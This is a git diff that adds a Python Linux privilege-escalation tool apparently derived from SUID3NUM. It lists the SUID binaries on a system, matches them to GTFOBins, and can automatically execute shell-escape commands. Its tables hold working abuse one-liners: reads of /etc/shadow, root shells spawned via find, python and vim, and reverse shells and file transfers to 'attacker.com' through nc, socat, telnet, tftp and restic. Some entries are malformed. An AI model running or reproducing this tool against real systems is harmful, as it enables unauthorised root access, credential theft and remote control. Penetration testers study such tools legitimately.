diff --git a/privesc/suid3num.py b/privesc/suid3num.py new file mode 100755 index 0000000..ddcae49 --- /dev/null +++ b/privesc/suid3num.py @@ -0,0 +1,339 @@ +#!/usr/bin/python3 + +""" +Works with both python2 & python3 +""" + +from sys import argv +from os import system, popen +from time import sleep + +""" +The following list contains exploits for all known SUID binaries +""" + +customSUIDs = { + 'aria2c': 'COMMAND=\'id\'\nTF=$(mktemp)\necho "$COMMAND" > $TF\nchmod +x $TF\n./aria2c --on-download-error=$TF http://x', + 'arp': 'LFILE=file_to_read\n./arp -v -f "$LFILE"', + 'base32': 'LFILE=file_to_read\nbase32 "$LFILE" | base32 --decode', + 'base64': 'LFILE=file_to_read\n./base64 "$LFILE" | base64 --decode', + 'byebug': 'TF=$(mktemp)\necho \'system("/bin/sh")\' > $TF\n./byebug $TF\ncontinue', + 'chmod': 'LFILE=file_to_change\n./chmod 0777 $LFILE', + 'chown': 'LFILE=file_to_change\n./chown $(id -un):$(id -gn) $LFILE', + 'cp': 'LFILE=file_to_write\nTF=$(mktemp)\necho "DATA" > $TF\n./cp $TF $LFILE', + 'curl': 'URL=http://attacker.com/file_to_get\nLFILE=file_to_save\n./curl $URL -o $LFILE', + 'date': 'LFILE=file_to_read\n./date -f $LFILE', + 'dd': 'LFILE=file_to_write\necho "data" | ./dd of=$LFILE', + 'dialog': 'LFILE=file_to_read\n./dialog --textbox "$LFILE" 0 0', + 'diff': 'LFILE=file_to_read\n./diff --line-format=%L /dev/null $LFILE', + 'dmsetup': "./dmsetup create base < $TF\necho \'exec /bin/sh -p 0<&1\' >> $TF\nchmod +x $TF\ngtester -q $TF', + 'hd': 'LFILE=file_to_read\n./hd "$LFILE"', + 'hexdump': 'LFILE=file_to_read\n./hexdump -C "$LFILE"', + 'highlight': 'LFILE=file_to_read\n./highlight --no-doc --failsafe "$LFILE"', + 'iconv': 'LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 "$LFILE"', + 'iftop': './iftop\n!/bin/sh', + 'ip': 'LFILE=file_to_read\n./ip -force -batch "$LFILE"', + 'jjs': 'echo "Java.type(\'java.lang.Runtime\').getRuntime().exec(\'/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)\').waitFor()" | ./jjs', + 'jq': 'LFILE=file_to_read\n./jq -Rr . "$LFILE"', + 'ksshell': 'LFILE=file_to_read\n./ksshell -i $LFILE', + 'ldconfig': 'TF=$(mktemp -d)\necho "$TF" > "$TF/conf"\n# move malicious libraries in $TF\n./ldconfig -f "$TF/conf"', + 'look': 'LFILE=file_to_read\n./look \'\' "$LFILE"', + 'lwp-download': 'URL=http://attacker.com/file_to_get\nLFILE=file_to_save\n./lwp-download $URL $LFILE', + 'lwp-request': 'LFILE=file_to_read\n./lwp-request "file://$LFILE"', + 'mv': 'LFILE=file_to_write\nTF=$(mktemp)\necho "DATA" > $TF\n./mv $TF $LFILE', + 'mysql': "./mysql -e '\\! /bin/sh'", 'awk': './awk \'BEGIN {system("/bin/sh")}\'', + 'nano': './nano\n^R^X\nreset; sh 1>&0 2>&0', + 'nawk': './nawk \'BEGIN {system("/bin/sh")}\'', + 'nc': 'RHOST=attacker.com\nRPORT=12345\n./nc -e /bin/sh $RHOST $RPORT', + 'nmap': 'TF=$(mktemp)\necho \'os.execute("/bin/sh")\' > $TF\n./nmap --script=$TF', + 'nohup': 'nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"', + 'openssl': 'openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n', + 'pic': './pic -U\n.PS\nsh X sh X', + 'pico': './pico\n^R^X\nreset; sh 1>&0 2>&0', + 'pry': './pry\nsystem("/bin/sh")', + 'readelf': 'LFILE=file_to_read\n./readelf -a @$LFILE', + 'restic': 'RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\n./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"', + 'scp': 'TF=$(mktemp)\necho \'sh 0<&2 1>&2\' > $TF\nchmod +x "$TF"\n./scp -S $TF a b:', + 'shuf': 'LFILE=file_to_write\n./shuf -e DATA -o "$LFILE"\nsudo:', + 'soelim': 'LFILE=file_to_read\n./soelim "$LFILE"', + 'sqlite3': "./sqlite3 /dev/null '.shell /bin/sh'", 'socat': 'RHOST=attacker.com\nRPORT=12345\n./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane', + 'strings': 'LFILE=file_to_read\n./strings "$LFILE"', + 'sysctl': 'LFILE=file_to_read\n./sysctl -n "/../../$LFILE"', + 'systemctl': 'TF=$(mktemp).service\necho \'[Service]\nType=oneshot\nExecStart=/bin/sh -c "id > /tmp/output"\n[Install]\nWantedBy=multi-user.target\' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF', + 'tac': 'LFILE=file_to_read\n./tac -s \'PromiseWontOverWrite\' "$LFILE"', + 'tar': './tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh', + 'tee': 'LFILE=file_to_write\necho DATA | ./tee -a "$LFILE"', + 'telnet': 'RHOST=attacker.com\nRPORT=12345\n./telnet $RHOST $RPORT\n^]\n!/bin/sh', + 'tftp': 'RHOST=attacker.com\n./tftp $RHOST\nput file_to_send', + 'uudecode': 'LFILE=file_to_read\nuuencode "$LFILE" /dev/stdout | uudecode', + 'uuencode': 'LFILE=file_to_read\nuuencode "$LFILE" /dev/stdout | uudecode', + 'xz': 'LFILE=file_to_read\n./xz -c "$LFILE" | xz -d', + 'zip': "TF=$(mktemp -u)\n./zip $TF /etc/hosts -T -TT 'sh #'\nsudo rm $TF", 'wget': 'export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\n./wget $URL -O $LFILE', + 'zsoelim': 'LFILE=file_to_read\n./zsoelim "$LFILE"', +} + +""" +The following list contains all default SUID bins found within Unix +""" + +defSUIDBinaries = ["arping", "at", "bwrap", "chfn", "chrome-sandbox", "chsh", "dbus-daemon-launch-helper", "dmcrypt-get-device", "exim4", "fusermount", "gpasswd", "helper", "kismet_capture", "lxc-user-nic", "mount", "mount.cifs", "mount.ecryptfs_private", "mount.nfs", "newgidmap", "newgrp", "newuidmap", "ntfs-3g", "passwd", "ping", "ping6", "pkexec", "polkit-agent-helper-1", "pppd", "snap-confine", "ssh-keysign", "su", "sudo", "traceroute6.iputils", "ubuntu-core-launcher", "umount", "VBoxHeadless", "VBoxNetAdpCtl", "VBoxNetDHCP", "VBoxNetNAT", "VBoxSDL", "VBoxVolInfo", "VirtualBoxVM", "vmware-authd", "vmware-user-suid-wrapper", "vmware-vmx", "vmware-vmx-debug", "vmware-vmx-stats", "Xorg.wrap"] + +""" +Auto Exploitation of SUID Bins - List +""" + +suidExploitation = { + 'ash': '', + 'bash': '-p', + 'busybox': 'sh', + 'cat': '/etc/shadow', + 'chroot': '/ /bin/sh -p', + 'csh': '-b', + 'cut': '-d "" -f1 /etc/shadow', + 'dash': '-p', + 'docker': 'run -v /:/mnt --rm -it alpine chroot /mnt sh', + 'emacs': '-Q -nw --eval \'(term "/bin/sh -p")\'', + 'env': '/bin/sh -p', + 'expand': '/etc/shadow', + 'expect': '-c "spawn /bin/sh -p;interact"', + 'find': '. -exec /bin/sh -p \\; -quit', + 'flock': '-u / /bin/sh -p', + 'fold': '-w99999999 /etc/shadow', + 'gawk': '\'BEGIN {system("/bin/sh")}\'', + 'gdb': '-q -nx -ex \'python import os; os.execl("/bin/sh", "sh", "-p")\' -ex quit', + 'gimp': '-idf --batch-interpreter=python-fu-eval -b \'import os; os.execl("/bin/sh", "sh", "-p")\'', + 'grep': '"" /etc/shadow', + 'head': '-c2G /etc/shadow', + 'ionice': '/bin/sh -p', + 'jrunscript': '-e "exec(\'/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)\')"', + 'ksh': '-p', + 'ld.so': '/bin/sh -p', + 'less': '/etc/shadow', + 'logsave': '/dev/null /bin/sh -i -p', + 'lua': '-e \'os.execute("/bin/sh")\'', + 'make': '-s --eval=$\'x:\\n\\t-\'"/bin/sh -p"', + 'mawk': '\'BEGIN {system("/bin/sh")}\'', + 'more': '/etc/shadow', + 'nice': '/bin/sh -p', + 'nl': '-bn -w1 -s \'\' /etc/shadow', + 'node': 'node -e \'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});\'', + 'od': 'od -An -c -w9999 /etc/shadow | sed -E -e \'s/ //g\' -e \'s/\\\\n/\\n/g\'', + 'perl': '-e \'exec "/bin/sh";\'', + 'pg': '/etc/shadow', + 'php': '-r "pcntl_exec(\'/bin/sh\', [\'-p\']);"', + 'python': '-c \'import os; os.execl("/bin/sh", "sh", "-p")\'', + 'rlwrap': '-H /dev/null /bin/sh -p', + 'rpm': '--eval \'%{lua:os.execute("/bin/sh", "-p")}\'', + 'rpmquery': '--eval \'%{lua:posix.exec("/bin/sh", "-p")}\'', + 'rsync': '-e \'sh -p -c "sh 0<&2 1>&2"\' 127.0.0.1:/dev/null', + 'run-parts': '--new-session --regex \'^sh$\' /bin --arg=\'-p\'', + 'rvim': '-c \':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")\'', + 'sed': '-e "" /etc/shadow', + 'setarch': '$(arch) /bin/sh -p', + 'sort': '-m /etc/shadow', + 'start-stop-daemon': '-n $RANDOM -S -x /bin/sh -- -p', + 'stdbuf': '-i0 /bin/sh -p', + 'strace': '-o /dev/null /bin/sh -p', + 'tail': '-c2G /etc/shadow', + 'taskset': '1 /bin/sh -p', + 'time': '/bin/sh -p', + 'timeout': '7d /bin/sh -p', + 'ul': '/etc/shadow', + 'unexpand': 'unexpand -t99999999 /etc/shadow', + 'uniq': '/etc/shadow', + 'unshare': '-r /bin/sh', + 'vim': '-c \':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")\'', + 'watch': '-x sh -c \'reset; exec sh 1>&0 2>&0\'', + 'xargs': '-a /dev/null sh -p', + 'xxd': '/etc/shadow | xxd -r', + 'zsh': '', +} + +""" +The following list contains GTFO Bins binaries which are SUID exploitable +""" + +gtfoBinsList = ['bash', 'busybox', 'cat', 'chroot', 'cut', 'dash', 'docker', 'env', 'expand', 'expect', 'find', 'flock', 'fold', 'gdb', 'grep', 'head', 'ionice', 'jrunscript', 'ksh', 'ld.so', 'less', 'logsave', 'make', 'more', 'nice', 'nl', 'node', 'od', 'perl', 'pg', 'php', 'python', 'rlwrap', 'rpm', 'rpmquery', 'rsync', 'run-parts', 'rvim', 'sed', 'setarch', 'sort', 'start-stop-daemon', 'stdbuf', 'strace', 'tail', 'taskset', 'time', 'timeout', 'ul', 'unexpand', 'uniq', 'unshare', 'vim', 'watch', 'xargs', 'xxd', 'zsh', 'aria2c', 'arp', 'ash', 'base32', 'base64', 'byebug', 'chmod', 'chown', 'cp', 'csh', 'curl', 'date', 'dd', 'dialog', 'diff', 'dmsetup', 'file', 'ed', 'emacs', 'eqn', 'fmt', 'gawk', 'gimp', 'git', 'gtester', 'hd', 'hexdump', 'highlight', 'iconv', 'iftop', 'ip', 'jjs', 'jq', 'ksshell', 'ldconfig', 'look', 'lua', 'lwp-download', 'lwp-request', 'mawk', 'mv', 'mysql', 'awk', 'nano', 'nawk', 'nc', 'nmap', 'nohup', 'openssl', 'pic', 'pico', 'pry', 'readelf', 'restic', 'scp', 'shuf', 'soelim', 'sqlite3', 'socat', 'strings', 'sysctl', 'systemctl', 'tac', 'tar', 'tclsh', 'tee', 'telnet', 'tftp', 'uudecode', 'uuencode', 'xz', 'zip', 'wget', 'zsoelim'] + +""" +Colors List +""" + +cyan = "\033[0;96m" +green = "\033[0;92m" +white = "\033[0;97m" +red = "\033[0;91m" +blue = "\033[0;94m" +yellow = "\033[0;33m" +magenta = "\033[0;35m" + +barLine = "------------------------------" + +banner = magenta + " ___ _ _ _ ___ _____ _ _ _ __ __ \n" +banner += yellow + " / __| | | / | \\ |__ / \\| | | | | \\/ |\n" +banner += blue + " \\__ \\ |_| | | |) | |_ \\ .` | |_| | |\\/| |\n" +banner += red + " |___/\\___/|_|___/ |___/_|\\_|\\___/|_| |_| " + cyan + " twitter@syed__umar\n" + + +def listAllSUIDBinaries(): + """ + Listing all SUID Binaries found in the system + """ + + print(white + "[" + blue + "#" + white + "] " + yellow + "Finding/Listing all SUID Binaries ..") + print(white + barLine) + + command = "find / -perm -4000 -type f 2>/dev/null" # Since /4000 isn't backwards compatible with old versions of find .. :)) + result = popen(command).read().strip().split("\n") + + for bins in result: + print(yellow + bins) + + print(white + barLine + "\n\n") + return(result) + +def doSomethingPlis(listOfSuidBins): + """ + This function prints the following data: + - Default binaries which ship with installation of linux + - Custom binaries which aren't part of default list + - Binaries which match GTFObins list! + """ + + _bins = [] + binsInGTFO = [] + customSuidBins = [] + defaultSuidBins = [] + + for bins in listOfSuidBins: + _binName = bins.split("/")[::-1][0] + + if _binName not in defSUIDBinaries: + customSuidBins.append(bins) + + if _binName in gtfoBinsList: + binsInGTFO.append(bins) + + else: + defaultSuidBins.append(bins) + + print(white + "["+ red + "!" + white + "] Default Binaries (Don't bother)") + print(barLine) + for bins in defaultSuidBins: print(blue + bins) + print(white + barLine + "\n\n") + + print(white + "[" + cyan + "~" + white + "] " + cyan + "Custom SUID Binaries (Interesting Stuff)") + print(white + barLine) + for bins in customSuidBins: print(cyan + bins) + print(white + barLine + "\n\n") + + """ + QWgsIEkgc2VlIHlvdSdyZSBhIG1hbiBvZiBjdWx0dXJlIGFzIHdlbGwgOkQgCk5vdCBldmVyeW9uZSByZWFkcyBzb3VyY2UgY29kZSBvZiB3aGF0IHRoZXkncmUgcnVubmluZyBub3ctYS1kYXlzIMKvXF8o44OEKV8vwq8K + """ + + if len(binsInGTFO) != 0: + print("[" + green + "#" + white + "] " + green + "SUID Binaries in GTFO bins list (Hell Yeah!)") + print(white + barLine) + + for bin in binsInGTFO: + pathOfBin = popen("which " + bin).read().strip() + gtfoUrl = "https://gtfobins.github.io/gtfobins/" + bin[::-1].split("/")[0][::-1] + "/#suid" + print(green + pathOfBin + white + " -~> " + magenta + gtfoUrl) + + print(white + barLine + "\n\n") + + else: + print("[" + green + "#" + white + "] " + green + "SUID Binaries found in GTFO bins..") + print(white + barLine) + print("[" + red + "!" + white + "] " + magenta + "None " + red + ":(") + print(white + barLine + "\n\n") + + + """ + PR by @th3instein + @modded + """ + binsToExploit = [] + _binsToExploit = {} + for binary in binsInGTFO: + binaryName = binary[::-1].split("/")[0][::-1] + + if binaryName not in suidExploitation: + _binsToExploit[binary] = customSUIDs[binaryName] + + + if len(_binsToExploit) != 0: + print("[" + yellow + "&" + white + "] " + cyan + "Manual Exploitation (Binaries which create files on the system)") + print(white + barLine) + + for binaryPath, binaryExploitation in _binsToExploit.items(): + binaryName = binaryPath[::-1].split("/")[0][::-1] + binaryExploitation = binaryExploitation.replace(binaryName, binaryPath).replace("./", "") + + # print(binaryName, binaryExploitation) + + print(white + "[" + cyan + "&" + white + "] " + magenta + binaryName.capitalize() + white + " ( " + green + binaryPath + " )" + white) + print(yellow + binaryExploitation + white + "\n") + + print(white + barLine + "\n\n") + """ + @PR End + """ + return(binsInGTFO, defaultSuidBins, customSuidBins) + + +def note(): + print(white + "[" + red + "-" + white + "] " + magenta + "Note") + print(white + barLine) + print(blue + "If you see any FP in the output, please report it to make the script better! :)") + print(white + barLine + "\n") + +def exploitThisShit(bins): + commands = [] + + for suidBins in bins: + _bin = suidBins.split("/")[::-1][0] + + if _bin in suidExploitation: + _results = suidBins + " " + suidExploitation[_bin] + commands.append(_results) + + if len(commands) != 0: + if len(argv) == 2: + if argv[1] == '-e': + print(white + "[" + magenta + "$" + white + "] " + white + "Auto Exploiting SUID bit binaries !!!") + print(white + barLine) + + for _commands in commands: + print(magenta + "\n[#] Executing Command .. ") + print(cyan + "[~] " + _commands + "\n" + white) + sleep(0.5) + system(_commands) + sleep(0.5) + + else: + print(white + "[" + green + "$" + white + "] " + white + "Please try the command(s) below to exploit harmless SUID bin(s) found !!!") + print(white + barLine) + + for _commands in commands: + print("[~] " + _commands) + + print(white + barLine + "\n\n") + +def main(): + print(banner) + try: + suidBins = listAllSUIDBinaries() + gtfoBins = doSomethingPlis(suidBins) + exploitThisShit(gtfoBins[0]); note() + + except KeyboardInterrupt: + print("\n[" + red + "!" + white + "] " + red + "Aye, why you do dis!?") + +if __name__ == '__main__': + main()